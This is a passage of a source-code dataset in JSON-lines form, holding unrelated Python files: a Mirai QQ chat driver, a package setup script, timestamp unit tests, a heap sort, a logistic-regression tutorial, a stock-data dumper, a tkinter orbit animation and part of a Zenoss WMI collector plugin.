user_id=user_id,\n message_id=message_id)\n quote = message_chain.get_quote()\n if quote:\n unified_message.chat_attrs.reply_to = ChatAttribute(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n user_id=quote.senderId,\n name='unknown',\n message_id=quote.id)\n\n for m in message_chain[1:]:\n if isinstance(m, (Image, FlashImage)):\n # message not empty or contained a image, append to list\n if unified_message.image or unified_message.text:\n message_list.append(unified_message)\n unified_message = UnifiedMessage(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n name=username,\n user_id=user_id,\n message_id=message_id)\n unified_message.image = m.url\n self.logger.debug(f'Received image: [{m.imageId}]')\n\n elif isinstance(m, Plain):\n unified_message.text += m.text\n elif isinstance(m, At):\n\n at_user_text = m.display\n unified_message.text_entities.append(\n MessageEntity(start=len(unified_message.text),\n end=len(unified_message.text) + len(at_user_text),\n entity_type=EntityType.BOLD))\n unified_message.text += at_user_text\n elif isinstance(m, AtAll):\n\n at_user_text = '[@All]'\n unified_message.text_entities.append(\n MessageEntity(start=len(unified_message.text),\n end=len(unified_message.text) + len(at_user_text),\n entity_type=EntityType.BOLD))\n unified_message.text += at_user_text\n elif isinstance(m, Face):\n qq_face = int(m.faceId) & 255\n if qq_face in qq_emoji_list:\n unified_message.text += qq_emoji_list[qq_face]\n else:\n unified_message.text += '\\u2753' # ❓\n elif isinstance(m, Source):\n pass\n elif isinstance(m, Quote):\n pass\n else:\n unified_message.text += str(m)\n self.logger.debug(f'Unhandled message type: {str(m)}')\n\n message_list.append(unified_message)\n return message_list\n\n def start(self):\n def run():\n nonlocal self\n asyncio.set_event_loop(self.loop)\n self.logger.debug(f'Starting Session for {self.name}')\n\n self.loop.create_task(self.updater.run_task())\n self.loop.run_forever()\n\n t = threading.Thread(target=run)\n t.daemon = True\n UMRDriver.threads.append(t)\n t.start()\n\n self.logger.debug(f'Finished initialization for {self.name}')\n\n async def send(self, to_chat: Union[int, str], chat_type: ChatType, messsage: UnifiedMessage):\n \"\"\"\n decorator for send new message\n :return:\n \"\"\"\n self.logger.debug('calling real send')\n return asyncio.run_coroutine_threadsafe(self._send(to_chat, chat_type, messsage), self.loop)\n\n async def _send(self, to_chat: int, chat_type: ChatType, message: UnifiedMessage):\n \"\"\"\n decorator for send new message\n :return:\n \"\"\"\n messages = list()\n\n if (chat_type == ChatType.PRIVATE and self.config.NameforPrivateChat) or \\\n (chat_type in (ChatType.GROUP, ChatType.DISCUSS) and self.config.NameforGroupChat):\n # name logic\n if message.chat_attrs.name:\n messages.append(Plain(text=message.chat_attrs.name))\n # if message.chat_attrs.reply_to:\n # messages.append(Plain(text=' (➡️️' + message.chat_attrs.reply_to.name + ')'))\n if message.chat_attrs.forward_from:\n messages.append(Plain(text=' (️️↩️' + message.chat_attrs.forward_from.name + ')'))\n if message.chat_attrs.name:\n messages.append(Plain(text=': '))\n\n # at user\n if not message.send_action.message_id and message.send_action.user_id:\n messages.append(At(target=message.send_action.user_id))\n messages.append(Plain(text=' '))\n\n if message.text:\n messages.append(Plain(text=message.text))\n\n if message.image:\n # if chat_type == ChatType.PRIVATE:\n # image_type = TargetType.Friend\n # else:\n # image_type = TargetType.Group\n image_id = self.image_cache.get((chat_type, message.image))\n if image_id:\n image = Image(imageId=image_id)\n else:\n image = Image(path=message.image)\n # image = await self.bot.upload_image(image_type=image_type, image_path=message.image)\n # self.image_cache[(image_type, message.image)] = image.imageId\n messages.append(image)\n self.logger.info('If QQ does not receive this message, '\n 'your account might be suspected of being compromised by Tencent')\n\n quote = message.send_action.message_id or None\n temp_group = None\n if chat_type == ChatType.PRIVATE:\n message_type = MessageType.FRIEND\n else:\n if '[TempMessage]' in message.chat_attrs.name:\n message_type = MessageType.Temp\n temp_group = message.chat_attrs.chat_id\n else:\n message_type = MessageType.GROUP\n\n egress_message = await self.bot.send_message(\n target=to_chat,\n message_type=message_type,\n message=messages,\n temp_group=temp_group,\n quote_source=quote\n )\n\n for i in messages:\n if isinstance(i, Image):\n self.image_cache[(chat_type, message.image)] = i.imageId\n break\n\n if message.chat_attrs:\n set_egress_message_id(src_platform=message.chat_attrs.platform,\n src_chat_id=message.chat_attrs.chat_id,\n src_chat_type=message.chat_attrs.chat_type,\n src_message_id=message.chat_attrs.message_id,\n dst_platform=self.name,\n dst_chat_id=to_chat,\n dst_chat_type=chat_type,\n dst_message_id=egress_message.messageId,\n user_id=self.qq)\n\n async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):\n if chat_type != ChatType.GROUP:\n return False\n return False\n\n async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):\n if chat_type != ChatType.GROUP:\n return False\n return False\n\n def handle_exception(self, loop, context):\n # context[\"message\"] will always be there; but context[\"exception\"] may not\n msg = context.get(\"exception\", context[\"message\"])\n self.logger.exception('Unhandled exception: ', exc_info=msg)\n\n\nUMRDriver.register_driver('Mirai', MiraiDriver)\n","sub_path":"umr_mirai_driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":23664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"517461700","text":"# Copyright (c) 2019 The Regents of the University of Michigan\n# All rights reserved.\n# This software is licensed under the BSD 3-Clause License.\nfrom setuptools import setup, find_packages\nimport os\nimport sys\n\ndescription = \"Samples, parsers, and writers for formats used in the Glotzer Group.\"\n\n# Import Cython if available\ntry:\n from Cython.Build import cythonize\n import numpy as np\nexcept ImportError:\n print(\"WARNING: Cython not available!\", file=sys.stderr)\n CYTHON = False\nelse:\n CYTHON = True\n\n# Get long description from README.md\ntry:\n this_path = os.path.dirname(os.path.abspath(__file__))\n fn_readme = os.path.join(this_path, 'README.md')\n with open(fn_readme) as fh:\n long_description = fh.read()\nexcept (IOError, OSError):\n long_description = description\n\n\nsetup(\n name='garnett',\n version='0.6.1',\n packages=find_packages(),\n\n ext_modules=cythonize('garnett/*.pyx') if CYTHON else [],\n include_dirs=[np.get_include()] if CYTHON else [],\n\n author='Carl Simon Adorf',\n author_email='csadorf@umich.edu',\n description=description,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n keywords='simulation trajectory formats particle',\n\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n\n python_requires='>=3.5, <4',\n\n install_requires=[\n 'rowan>=0.5'\n ],\n\n tests_require=[\n 'nose',\n 'ddt'\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"356847838","text":"################################################################################\n# Copyright (c) 2009-2021, National Research Foundation (SARAO)\n#\n# Licensed under the BSD 3-Clause License (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy\n# of the License at\n#\n# https://opensource.org/licenses/BSD-3-Clause\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"Tests for the timestamp module.\"\"\"\nfrom __future__ import print_function, division, absolute_import\n\nimport unittest\n\nimport ephem\n\nimport katpoint\n\n\nclass TestTimestamp(unittest.TestCase):\n \"\"\"Test timestamp creation and conversion.\"\"\"\n def setUp(self):\n self.valid_timestamps = [(1248186982.3980861, '2009-07-21 14:36:22.398'),\n (ephem.Date('2009/07/21 02:52:12.34'), '2009-07-21 02:52:12.340'),\n (0, '1970-01-01 00:00:00'),\n (-10, '1969-12-31 23:59:50'),\n ('2009-07-21 02:52:12.034', '2009-07-21 02:52:12.034'),\n ('2009-07-21 02:52:12.000', '2009-07-21 02:52:12'),\n ('2009-07-21 02:52:12', '2009-07-21 02:52:12'),\n ('2009-07-21 02:52', '2009-07-21 02:52:00'),\n ('2009-07-21 02', '2009-07-21 02:00:00'),\n ('2009-07-21', '2009-07-21 00:00:00'),\n ('2009-07', '2009-07-01 00:00:00'),\n ('2009', '2009-01-01 00:00:00'),\n ('2009/07/21 02:52:12.034', '2009-07-21 02:52:12.034'),\n ('2009/07/21 02:52:12.000', '2009-07-21 02:52:12'),\n ('2009/07/21 02:52:12', '2009-07-21 02:52:12'),\n ('2009/07/21 02:52', '2009-07-21 02:52:00'),\n ('2009/07/21 02', '2009-07-21 02:00:00'),\n ('2009/07/21', '2009-07-21 00:00:00'),\n ('2009/07', '2009-07-01 00:00:00'),\n ('2009', '2009-01-01 00:00:00'),\n ('2019-07-21 02:52:12', '2019-07-21 02:52:12')]\n self.invalid_timestamps = ['gielie', '03 Mar 2003']\n self.overflow_timestamps = ['2049-07-21 02:52:12']\n\n def test_construct_timestamp(self):\n \"\"\"Test construction of timestamps.\"\"\"\n for v, s in self.valid_timestamps:\n t = katpoint.Timestamp(v)\n self.assertEqual(str(t), s, \"Timestamp string ('%s') differs from expected one ('%s')\" % (str(t), s))\n for v in self.invalid_timestamps:\n self.assertRaises(ValueError, katpoint.Timestamp, v)\n# for v in self.overflow_timestamps:\n# self.assertRaises(OverflowError, katpoint.Timestamp, v)\n\n def test_numerical_timestamp(self):\n \"\"\"Test numerical properties of timestamps.\"\"\"\n t = katpoint.Timestamp(self.valid_timestamps[0][0])\n self.assertEqual(t, t + 0.0)\n self.assertNotEqual(t, t + 1.0)\n self.assertTrue(t > t - 1.0)\n self.assertTrue(t < t + 1.0)\n self.assertEqual(t, eval('katpoint.' + repr(t)))\n self.assertEqual(float(t), self.valid_timestamps[0][0])\n t = katpoint.Timestamp(self.valid_timestamps[1][0])\n self.assertAlmostEqual(t.to_ephem_date(), self.valid_timestamps[1][0], places=9)\n try:\n self.assertEqual(hash(t), hash(t + 0.0), 'Timestamp hashes not equal')\n except TypeError:\n self.fail('Timestamp object not hashable')\n\n def test_operators(self):\n \"\"\"Test operators defined for timestamps.\"\"\"\n T = katpoint.Timestamp(self.valid_timestamps[0][0])\n S = T.secs\n # Logical operators, float treated as absolute time\n self.assertTrue(T == S)\n self.assertTrue(T < S+1)\n self.assertTrue(T > S-1)\n # Arithmetic operators, float treated as interval\n self.assertTrue(isinstance(T - S, katpoint.Timestamp))\n self.assertTrue(isinstance(S - T, float))\n self.assertTrue(isinstance(T - T, float))\n","sub_path":"katpoint/test/test_timestamp.py","file_name":"test_timestamp.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"499067045","text":"def left(ind):\n return (2 * ind) + 1\n\n\ndef right(ind):\n return (2 * ind) + 2\n\n\ndef heapify(arr, i, heap_size):\n l = left(i)\n r = right(i)\n if l < heap_size and arr[l] > arr[i]:\n largest = l\n else:\n largest = i\n if r < heap_size and arr[r] > arr[largest]:\n largest = r\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n # print(\"array after heapifying\", arr)\n heapify(arr, largest, heap_size)\n\n\ndef build_max(arr, heap_size):\n f_nonleaf = len(arr) // 2\n for i in range(f_nonleaf-1, -1, -1):\n heapify(arr, i, heap_size)\n\n # print(\"in build == \", arr)\n\n\ndef heap_sort(arr):\n heap_size = len(arr)\n arr_len = len(arr)\n build_max(arr, heap_size)\n # print(\"after buld == \", arr)\n for i in range(arr_len-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heap_size -= 1\n heapify(arr, 0, heap_size)\n\n return arr\n\nfrom random import randint\n\narr = []\nfor i in range(21):\n arr.append(randint(1, 100))\n\nprint(arr)\nheap_sort(arr)\nprint(arr)","sub_path":"Sorting/HeapSort.py","file_name":"HeapSort.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598935250","text":"#!/usr/bin/env python\n\nimport json\nimport os\nimport numpy\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\"\"\"\nThis file is used for visualizing the collected dataset.\nIf and unloading behavior is successful, it will be marked with green circle. Red cross for unsuccessful case.\n\"\"\"\n\n\nclass data_visualization(object):\n\n def __init__(self, image_path, annotation_file):\n self._path = image_path\n self._ant_file = annotation_file\n\n #read annotation file (json) into an object\n self.annotations = {}\n self.h = 256\n self.w = 256\n with open (self._ant_file, 'r') as f: \n self.annotations = json.load(f)\n\n def mark_labels(self):\n #mark the annotations on the image for every input data\n for f in os.listdir(self._path):\n image = mpimg.imread(self._path+'/'+f)\n image_id = int(f.split('.')[0])\n plt.imshow(image)\n #create a list to store unloading points. Notice, the y-coord needs conversion\n for instance in self.annotations:\n if instance[\"image_id\"] == image_id:\n \n point = [instance['robot_pose'][0], instance['robot_pose'][1]-self.h/2]\n if instance['unloading_result'] == True:\n plt.plot(point[0], point[1], 'og', markersize=5)\n else:\n plt.plot(point[0], point[1], marker='x', color='red', markersize=5)\n #plt.show()\n plt.savefig('data/visualization/'+f)\n plt.close()\n #break\n\nif __name__ == '__main__':\n image_path = 'data/images'\n annotation_file = 'data/annotations.txt'\n\n test = data_visualization(image_path, annotation_file)\n test.mark_labels()\n","sub_path":"tamp_perception/src/data_visulization.py","file_name":"data_visulization.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"542462415","text":"import math\ndef isprime(n):\n for i in range(2,int(math.sqrt(n))+1):\n if n % i == 0:\n return False\n return True\n\ndef sumofprimes(n):\n sum = 2\n for i in range(3,n):\n if isprime(i):\n sum = sum + i\n return sum\n\nprint(str(sumofprimes(2000000)))\n","sub_path":"Python/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"113539965","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom tkinter import*\r\nfrom math import*\r\n \r\nfenetre = Tk()\r\nfenetre.title(\"le mouvement d'une planète autour de son étoile\")\r\n\r\ndef mouvement():\r\n global t\r\n t=t+0.2#temps\r\n w1=0.25#poids\r\n w2=0.3\r\n dessin.coords(etoile,(xc-rs)+R*sin(t*pi),(yc-rs)+R*cos(t*pi),(xc+rs)+R*sin(t*pi),(yc+rs)+R*cos(t*pi))#mvt de l'etoile\r\n dessin.create_oval((xc-rs)+R*sin(t*pi)+rs-0.01,(yc-rs)+R*cos(t*pi)+rs-0.01,(xc-rs)+R*sin(t*pi)+rs+0.01,(yc-rs)+R*cos(t*pi)+rs+0.01,fill='blue')#trace laissee par le jaune et le bleu\r\n dessin.coords(planete,(xc-rp)+R1*sin(t*w1*pi),(yc-rp)+R1*cos(t*w1*pi),(xc+rp)+R1*sin(t*w1*pi),(yc+rp)+R1*cos(t*w1*pi))#mvt du rouge\r\n dessin.create_oval((xc-rp)+R1*sin(t*0.25*pi)+rp-0.01,(yc-rp)+R1*cos(t*0.25*pi)+rp-0.01,(xc-rp)+R1*sin(t*0.25*pi)+rp+0.1,(yc-rp)+R1*cos(t*0.25*pi)+rp+0.1,fill='green')#trace du rouge\r\n dessin.coords(lune,(xc-rlune)+R2*sin(t*w2*pi),(yc-rp)+R2*cos(t*w2*pi),(xc+rlune)+ R2*sin(t*w2*pi),(yc+rlune)+R2*cos(t*w2*pi))#mvt du bleu\r\n\r\n fenetre.after(90,mouvement)#vitesse de defilement\r\n\r\nglobal xs,ys,rs,xp,yp,rp,xc,yc,rc,R,t,xlune,ylune,rlune\r\nt=0\r\n#coordonnées du milieu de centre de masse\r\nxc=500\r\nyc=500\r\nrc=5 #son rayon\r\n#coordonées du centre de l'étoile\r\nxs=450\r\nys=450\r\nrs=20 #son rayon\r\n#coordonnées de la planète\r\nxp=300\r\nyp=300\r\nrp=20\r\n\r\n\r\n#coordonnées de lune\r\nxlune=450\r\nylune=450\r\nrlune=20\r\n\r\n\r\n\r\n# Rayon de la trajectoire de la planete autour de son étoile\r\nR= sqrt((xs-xc)**2+(ys-yc)**2)\r\n\r\nR1=sqrt((xp-xc)**2+(yp-yc)**2)\r\n\r\nR2=sqrt((xlune-xc)**2+(ylune-yc)**2)\r\n\r\ndessin = Canvas(fenetre, width=1000, height = 1000, bg=\"white\", bd=8, relief=\"ridge\")#width=largeur height=longueur bg=fond bd=le contour relief=la mise en avant de la fenetre testez avec raised\r\ndessin.pack()\r\ncentre=dessin.create_oval(xc-rc,yc-rc,xc+rc,yc+rc,fill=\"black\")#cree une boule noire\r\netoile=dessin.create_oval(xs-rs,ys-rs,xs+rs,ys+rs,fill=\"yellow\")#cree une boule jaune\r\nplanete=dessin.create_oval(xp-rp,yp-rp,xp+rp,yp+rp,fill=\"red\")#cree une boule rouge\r\nlune=dessin.create_oval(xlune-rlune,ylune-rlune,xlune+rlune,ylune+rlune,fill=\"blue\")#cree une boule bleu \r\n#si une des 3 lignes ci dessus disparait, il n'y a pas que la boule qui disparait. testez pour comprendre\r\n\r\nmouvement()\r\n\r\nfenetre.mainloop()\r\n","sub_path":"systeme_solaire.py","file_name":"systeme_solaire.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"428981372","text":"#coding=utf-8\n\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom lr_utils import load_dataset\n\n\"\"\"\nσ函数\n \n x: 标量,或者numpy数组\n\"\"\"\ndef sigmoid(x):\n s = 1.0 / (1 + 1/np.exp(x))\n return s\n\n\n\"\"\"\nσ函数求导\n \n x: 标量,或者numpy数组\n\"\"\"\ndef sigmoid_derivative(x):\n s = 1.0 / (1 + 1/np.exp(x))\n ds = s * (1 - s)\n return ds\n\n\n\"\"\"\n3维向量转成1维向量\n\n image: numpy数组,红绿蓝3维\n\"\"\"\ndef image2vector(image):\n v = image.reshape( (image.shape[0] * image.shape[1] * image.shape[2], 1) ) # 不改变数组的数据,改变矩阵的形状\n return v\n\n\n\"\"\"\n标准化矩阵的行\n\n x: n行m列矩阵\n\"\"\"\ndef normalizeRows(x):\n x_norm = np.linalg.norm(x, axis=1, keepdims=True) # 计算每一行的长度,得到一个列向量\n\n x = x / x_norm # 利用numpy的广播,用矩阵与列向量相除。\n return x\n\n\n\"\"\"\n \n\"\"\"\ndef softmax(x):\n x_exp = np.exp(x) # 算出矩阵所有元素(x)的e的x次方,形成新的矩阵\n\n x_sum = np.sum(x_exp, axis = 1, keepdims = True) # (n,1) 每行元素的和,形成n行1列矩阵\n\n s = x_exp / x_sum # (n,m) 广播的作用\n return s\n\n\"\"\"\nL1损失函数\n\n yhat,y : numpy array\n\"\"\"\ndef L1(yhat, y):\n loss = np.sum( np.abs(y - yhat) )\n return loss\n\n\n\"\"\"\nL2损失函数\n\n yhat,y : numpy array\n\"\"\"\ndef L2(yhat, y):\n loss = np.sum( np.power((y - yhat),2) )\n return loss\n\n\"\"\"\n创建元素为0的dim行1列向量\n\"\"\"\ndef initialize_with_zeros(dim):\n w = np.zeros((dim, 1))\n b = 0\n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\n\n\"\"\"\n实现正向传播,反向传播的损失函数及其导数\n\n w: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n Y: 真值标签向量, 0-非猫, 1-猫,格式为(1, 样本数)的numpy array\n\"\"\"\ndef propagate(w, b, X, Y):\n m = X.shape[1]\n\n A = sigmoid(np.dot(w.T, X)+b) # 计算激活函数\n cost = -(1.0/m)*np.sum(Y*np.log(A)+(1-Y)*np.log(1-A)) # 计算损失函数\n\n dw = (1.0/m)*np.dot(X,(A-Y).T)\n db = (1.0/m)*np.sum(A-Y)\n\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n\n grads = {\"dw\": dw,\n \"db\": db}\n\n return grads, cost\n\n\"\"\"\n通过运行梯度下降算法优化w和b\n\n x: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n Y: 真值标签向量, 0-非猫, 1-猫,格式为(1, 样本数)的numpy array\n num_iterations: 最优化函数的迭代次数\n learning_rate: 更新梯度下降算法的学习率\n print_cost: 'true'则每迭代100次打印损耗\n \n params: 包含权重w和偏置b的字典\n grads: 包含损失损失函数的权重和偏置的导数的字典(dictionary containing the gradients of the weights and bias with respect to the cost function)\n costs: 列表,包含最优化计算过程中所有损失,用来画出学习曲线\n\n\"\"\"\ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False):\n costs = []\n\n for i in range(num_iterations):\n grads, cost = propagate(w, b, X, Y)\n\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n w = w - learning_rate*dw\n b = b - learning_rate*db\n\n if i % 100 == 0:\n costs.append(cost)\n\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n\n params = {\"w\": w,\"b\": b}\n\n grads = {\"dw\": dw,\"db\": db}\n return params, grads, costs\n\n\n\"\"\"\n运用逻辑回归参数(w,b)预测标签是0还是1\n\n x: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n \n 返回: 为X的样本返回一个numpy array向量,包含预测值0或1\n\"\"\"\ndef predict(w, b, X):\n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0], 1)\n\n A = sigmoid(np.dot(w.T, X) + b)\n\n for i in range(A.shape[1]):\n if A[0,i] > 0.5:\n Y_prediction[0,i] = 1\n else:\n Y_prediction[0,i] = 0\n\n assert(Y_prediction.shape == (1, m))\n return Y_prediction\n\n\n\"\"\"\n通过调用前面实现的函数,建立逻辑回归模型\n X_train: 训练集, 通过numpy array表示, 格式为(num_px * num_px * 3, m_train)\n Y_train: 训练标签, 通过numpy array表示, 格式为(1, m_train)的向量\n X_test: 测试集, 通过numpy array表示, 格式为(num_px * num_px * 3, m_test)\n Y_test: 测试标签, 通过numpy array表示, 格式为(1, m_test)的向量\n num_iterations: 超参数,表示最优化参数过程的迭代次数\n learning_rate: 超参数,表示最优化方法的学习率\n print_cost: 打印损耗, 'true'则每迭代100次打印\n \n d: 包含模信息的字典\n\"\"\"\n\ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False):\n\n w, b = initialize_with_zeros(X_train.shape[0])\n\n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)\n\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n\n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n\n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test,\n \"Y_prediction_train\" : Y_prediction_train,\n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n return d\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"venv/myFunc.py","file_name":"myFunc.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"122495194","text":"__author__ = 'kittaaron'\n# 获取当时股票结果\n\nimport tushare as ts\nimport config.logginconfig\nimport logging\nfrom sqlalchemy import *\nfrom config import dbconfig\nimport datetime\nfrom model.StockInfo import StockInfo\nfrom model.HistData import HistData\nfrom utils.holiday_util import get_pre_transact_date\nimport sys\nfrom utils.db_utils import *\n\n\ndef save_list(datas, autocommit=True):\n session.add_all(datas)\n if autocommit:\n session.commit()\n\n\ndef build_by_hist_data(hist_data, serie):\n hist_data.volume = float(serie.volume)\n hist_data.open = float(serie.open)\n hist_data.close = float(serie.close)\n hist_data.high = float(serie.high)\n hist_data.low = float(serie.low)\n hist_data.p_change = float(serie.p_change)\n hist_data.price_change = float(serie.price_change)\n hist_data.ma5 = float(serie.ma5)\n hist_data.ma10 = float(serie.ma10)\n hist_data.ma20 = float(serie.ma20)\n hist_data.v_ma5 = float(serie.v_ma5)\n hist_data.v_ma10 = float(serie.v_ma10)\n hist_data.v_ma20 = float(serie.v_ma20)\n if 'turnover' in serie:\n hist_data.turnover = float(serie.turnover)\n\n\ndef get_pre_day_data(code, data_str, candidate_datas):\n pass\n\n\ndef build_by_k_data(hist_data, serie, pre_day_data):\n '''\n :param hist_data:\n :param serie:\n :param pre_day_data: 用来计算涨跌幅<当天价减前一天收盘价>\n :return:\n '''\n hist_data.volume = float(serie.volume)\n hist_data.open = float(serie.open)\n hist_data.close = float(serie.close)\n hist_data.high = float(serie.high)\n hist_data.low = float(serie.low)\n if pre_day_data is not None:\n price_change = round(hist_data.close - pre_day_data.close, 2)\n hist_data.price_change = float(price_change)\n hist_data.p_change = round((price_change / pre_day_data.close) * 100, 2)\n\n\ndef dump_hist_data(start_date, end_date):\n stocks = session.query(StockInfo).all()\n # stocks = session.query(StockInfo).filter(StockInfo.code==\"600682\").all()\n\n i = 1\n for row in stocks:\n if row is None:\n continue\n # 股票代码\n code = row.code\n # code = row['code']\n # 股票名称\n name = row.name\n # name = row['name']\n logging.info(\"%s %s 开始处理 %d\", code, name, i)\n\n hist_data = session.query(HistData).filter(\n and_(HistData.code == code, HistData.date >= start_date, HistData.date <= end_date)).first()\n\n mindatedata = session.query(HistData.code, func.min(HistData.date)).filter(HistData.code == code).group_by(\n HistData.code).first()\n maxdatedata = session.query(HistData.code, func.max(HistData.date)).filter(HistData.code == code).group_by(\n HistData.code).first()\n mindate = mindatedata[1] if mindatedata is not None else '2013-01-01'\n maxdate = maxdatedata[1] if maxdatedata is not None else datetime.date.today().strftime('%Y-%m-%d')\n\n\n i += 1\n if hist_data is not None:\n if mindate < start_date < maxdate < end_date:\n start_date = (datetime.datetime.strptime(maxdate, '%Y-%m-%d') + datetime.timedelta(days=1)).strftime(\n '%Y-%m-%d')\n elif start_date < mindate < end_date < maxdate:\n end_date = (datetime.datetime.strptime(mindate, '%Y-%m-%d') + datetime.timedelta(days=-1)).strftime(\n '%Y-%m-%d')\n else:\n logging.warning(\"%s %s %s~%s时间段内已有数据存在\", code, name, start_date, end_date)\n continue\n logging.info(\"开始dump %s %s %s~%s\", code, name, start_date, end_date)\n\n df = ts.get_hist_data(code, start=start_date, end=end_date)\n stock_hist_data = []\n if df is None or df.empty is True:\n logging.info(\"%s %s get_hist_data 没有取到历史数据, 开始从get_k_data获取\", code, name)\n df = ts.get_k_data(code, start=start_date, end=end_date)\n if df is None or df.empty is True:\n continue\n pre_day_data = None\n # 因为取出来的DataFrame正好是按时间排序的,取前一天数据时可以直接用\n for index, serie in df.iterrows():\n date = serie.date\n hist_data = HistData(code=code, name=name, date=date)\n build_by_k_data(hist_data, serie, pre_day_data)\n pre_day_data = serie\n stock_hist_data.append(hist_data)\n else:\n for index, serie in df.iterrows():\n date = index\n hist_data = HistData(code=code, name=name, date=date)\n build_by_hist_data(hist_data, serie)\n\n stock_hist_data.append(hist_data)\n save_list(stock_hist_data)\n logging.info(\"%s %s %s~%s hist data save ok\", code, name, start_date, end_date)\n\n\ndef get_start_date():\n max_date_indb = session.query(func.max(HistData.date)).first()\n max_date_indb = max_date_indb[0] if max_date_indb is not None else \"2005-12-31\"\n\n return max_date_indb if max_date_indb == datetime.date.today().strftime('%Y-%m-%d') \\\n else(datetime.datetime.strptime(max_date_indb, '%Y-%m-%d') + datetime.timedelta(days=1)).strftime('%Y-%m-%d')\n\n\nif __name__ == '__main__':\n start_date = get_start_date()\n delta = datetime.timedelta(days=0)\n current_hour = datetime.datetime.now().hour\n today = datetime.date.today()\n end_date = today.strftime('%Y-%m-%d')\n if current_hour < 15:\n end_date = get_pre_transact_date(end_date)\n\n argv = len(sys.argv)\n if argv > 2:\n start_date = sys.argv[1]\n end_date = sys.argv[2]\n logging.info(\"%s %s\", start_date, end_date)\n dump_hist_data(start_date, end_date)\n","sub_path":"stock/task/hist_data.py","file_name":"hist_data.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"325844854","text":"##############################################################################\n# \n# Copyright (C) Zenoss, Inc. 2007-2013, all rights reserved.\n# \n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n# \n##############################################################################\n\n\nfrom Products.DataCollector.plugins.CollectorPlugin import CollectorPlugin\n\nclass WMIPlugin(CollectorPlugin):\n \"\"\"\n A WMIPlugin defines a native Python collection routine and a parsing\n method to turn the returned data structure into a datamap. A valid\n WMIPlugin must implement the process method.\n \"\"\"\n transport = \"wmi\"\n deviceProperties = CollectorPlugin.deviceProperties + (\n 'zWmiMonitorIgnore', \n 'zWinUser',\n 'zWinPassword',\n 'zWinEventlogMinSeverity',\n 'zWinEventlogClause',\n )\n \n def condition(self, device, log):\n return not getattr(device, 'zWmiMonitorIgnore', True)\n\n def copyDataToProxy(self, device, proxy):\n for prop in self.deviceProperties:\n if device.hasProperty(prop, useAcquisition=True):\n value = device.getProperty(prop)\n elif hasattr(device, prop):\n value = getattr(device, prop)\n if callable(value):\n value = value()\n else:\n continue\n setattr(proxy, prop, value)\n # Do any other prep of plugin here\n setattr(proxy, 'lastChange', 